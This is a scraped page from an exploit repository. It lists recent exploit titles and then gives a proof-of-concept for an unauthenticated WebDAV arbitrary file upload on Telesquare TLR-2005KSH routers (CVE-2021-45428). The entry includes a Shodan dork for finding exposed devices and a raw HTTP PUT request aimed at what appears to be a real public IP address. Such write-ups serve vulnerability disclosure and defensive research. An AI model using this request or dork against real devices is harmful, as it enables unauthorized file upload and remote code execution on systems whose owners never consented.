be24992411
42 changes to exploits/shellcodes UDisk Monitor Z5 Phone - 'MonServiceUDisk.exe' Unquoted Service Path TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path Wondershare Dr.Fone 11.4.10 - Insecure File Permissions ExifTool 12.23 - Arbitrary Code Execution Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) Wondershare Dr.Fone 12.0.7 - Privilege Escalation (InstallAssistService) Prime95 Version 30.7 build 9 - Remote Code Execution (RCE) Akka HTTP 10.1.14 - Denial of Service USR IOT 4G LTE Industrial Cellular VPN Router 1.0.36 - Remote Root Backdoor Bookeen Notea - Directory Traversal SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure DLINK DIR850 - Insecure Access Control DLINK DIR850 - Open Redirect Apache CouchDB 3.2.1 - Remote Code Execution (RCE) Tenda HG6 v3.3.0 - Remote Command Injection Google Chrome 78.0.3904.70 - Remote Code Execution PyScript - Read Remote Python Source Code DLINK DAP-1620 A1 v1.01 - Directory Traversal Ruijie Reyee Mesh Router - Remote Code Execution (RCE) (Authenticated) ImpressCMS v1.4.4 - Unrestricted File Upload Microfinance Management System 1.0 - 'customer_number' SQLi WebTareas 2.4 - Blind SQLi (Authenticated) WordPress Plugin Advanced Uploader 4.2 - Arbitrary File Upload (Authenticated) Magento eCommerce CE v2.3.5-p2 - Blind SQLi Bitrix24 - Remote Code Execution (RCE) (Authenticated) CSZ CMS 1.3.0 - 'Multiple' Blind SQLi Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) e107 CMS v3.2.1 - Multiple Vulnerabilities Anuko Time Tracker - SQLi (Authenticated) TLR-2005KSH - Arbitrary File Upload Explore CMS 1.0 - SQL Injection Navigate CMS 2.9.4 - Server-Side Request Forgery (SSRF) (Authenticated) PHProjekt PhpSimplyGest v1.3. - Stored Cross-Site Scripting (XSS) Beehive Forum - Account Takeover MyBB 1.8.29 - MyBB 1.8.29 - Remote Code Execution (RCE) (Authenticated) WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF) Joomla Plugin SexyPolling 2.1.7 - SQLi WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
31 lines
No EOL
1,022 B
Text
31 lines
No EOL
1,022 B
Text
# Exploit Title: TLR-2005KSH - Arbitrary File Upload
|
|
# Date: 2022-05-11
|
|
# Shodan Dork: title:"Login to TLR-2021"
|
|
# Exploit Author: Ahmed Alroky
|
|
# Author Company : Aiactive
|
|
# Version: 1.0.0
|
|
# Vendor home page : http://telesquare.co.kr/
|
|
# Authentication Required: No
|
|
# Tested on: Windows
|
|
# CVE: CVE-2021-45428
|
|
|
|
# Vulnerability Description
|
|
# Due to the Via WebDAV (Web Distributed Authoring and Versioning),
|
|
# on the remote server,telesquare TLR-2021 allows unauthorized users to upload
|
|
# any file(e.g. asp, aspx, cfm, html, jhtml, jsp, shtml) which causes
|
|
# remote code execution as well.
|
|
# Due to the WebDAV, it is possible to upload the arbitrary
|
|
# file utilizing the PUT method.
|
|
|
|
# Proof-of-Concept
|
|
# Request
|
|
|
|
|
|
PUT /l6f3jd6cbf.txt HTTP/1.1
|
|
Host: 223.62.114.233:8081<http://223.62.114.233:8081/>
|
|
Accept-Encoding: gzip, deflate
|
|
Accept: */*
|
|
Accept-Language: en
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
|
|
Connection: close
|
|
Content-Length: 10 |